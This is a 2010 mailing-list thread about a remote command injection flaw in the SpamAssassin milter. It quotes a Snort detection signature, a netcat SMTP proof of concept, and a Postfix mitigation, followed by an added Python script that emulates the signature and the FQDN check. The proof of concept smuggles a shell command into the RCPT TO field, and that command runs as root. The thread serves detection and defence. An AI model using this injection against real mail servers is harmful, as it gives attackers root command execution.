Brian wrote:
On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
Just a heads up: I don't know if there is a problem with SA milter, but there is a Snort signature for it now.


-------- Original Message --------
Subject: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt
Date:   Mon, 8 Mar 2010 13:03:52 +0000
From:   Kevin Ross <kevros...@googlemail.com>
To: emerging-s...@emergingthreats.net <emerging-s...@emergingthreats.net>, Matt Jonkman <jonk...@jonkmans.com>



alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt"; flow:established,to_server; content:"to|3A|"; nocase; content:"root+|3A|\"|7C|"; nocase; within:15; classtype:attempted-user; reference:url,www.securityfocus.com/bid/38578; reference:url,seclists.org/fulldisclosure/2010/Mar/140; sid:1324412; rev:1;)

Kev


The key is this:

"If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied recipient (RCPT TO)."

PoC is:

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me () me com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo



Easily mitigated: you shouldn't be accepting mail to non-FQDN addresses.

mail from: n...@example.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need fully-qualified address
quit
221 2.0.0 Bye
Connection closed by foreign host.
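The signature and the mitigation above, as an added example that is not part of the original thread and not code from spamass-milter, Snort or Postfix: a Python emulation of the two content matches in ET sid 1324412 (`to:` nocase, then `root+:"|` nocase within 15 bytes of the end of the first match) run over constructed SMTP RCPT commands, beside an approximation of Postfix's "need fully-qualified address" rejection. The sample commands, the function names and the FQDN rule are assumptions; the real Snort engine matches on the reassembled stream after the `flow` check, which this does not model.

```python
import re

# Constructed SMTP envelope commands, modelled on the PoC in the thread
# (not captured traffic). The second one is an assumption: the same
# recipient prefix with a domain appended.
SAMPLE_COMMANDS = [
    'rcpt to: root+:"|touch /tmp/foo"',
    'RCPT TO:<root+:"|id"@mail.example.com>',
    'rcpt to: <alice@example.com>',
    'rcpt to: root',
]

# The two content patterns of the rule, decoded from their |hex| escapes.
SIG_FIRST = b"to:"          # content:"to|3A|"; nocase
SIG_SECOND = b'root+:"|'    # content:"root+|3A|\"|7C|"; nocase; within:15
SIG_WITHIN = 15


def matches_signature(payload: bytes) -> bool:
    """Emulate the rule's content matching on one payload.

    Snort's 'within:N' requires the whole second pattern to lie in the N
    bytes that follow the end of the previous match; the engine tries every
    occurrence of the first pattern, so we do the same.
    """
    hay = payload.lower()               # both contents are 'nocase'
    start = 0
    while True:
        i = hay.find(SIG_FIRST, start)
        if i < 0:
            return False
        end = i + len(SIG_FIRST)
        if SIG_SECOND in hay[end:end + SIG_WITHIN]:
            return True
        start = i + 1


def recipient_of(command: str):
    """Pull the address out of an 'RCPT TO:' command (None if not one)."""
    m = re.match(r"\s*rcpt\s+to\s*:\s*(.*?)\s*$", command, re.I)
    return m.group(1).strip("<>") if m else None


def is_fqdn_recipient(addr: str) -> bool:
    """Approximation (assumption) of Postfix reject_non_fqdn_recipient:
    the address must carry a domain part in dotted-label form. Quoted
    local parts and other RFC 5321 corner cases are not modelled."""
    local, sep, domain = addr.rpartition("@")
    if not sep or not local or not domain:
        return False
    labels = domain.split(".")
    if len(labels) < 2:
        return False
    return all(
        re.fullmatch(r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?", lab)
        for lab in labels
    )


def triage(commands):
    """For each command: (command, signature_hit, would_pass_fqdn_check)."""
    out = []
    for cmd in commands:
        hit = matches_signature(cmd.encode("latin-1"))
        addr = recipient_of(cmd)
        fqdn_ok = bool(addr) and is_fqdn_recipient(addr)
        out.append((cmd, hit, fqdn_ok))
    return out


if __name__ == "__main__":
    for cmd, hit, fqdn_ok in triage(SAMPLE_COMMANDS):
        print(f"sig={'HIT ' if hit else 'miss'} fqdn={'ok ' if fqdn_ok else 'REJ'}  {cmd}")
```

Run against the samples, the PoC line trips the signature and fails the FQDN check, which is exactly the 504 shown above; the point the code makes beyond the thread is that the two controls look at different parts of the address: the signature keys on the `root+:"|` prefix regardless of what follows, while the FQDN check only inspects the domain, so the second constructed command passes the FQDN check and still fires the signature.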




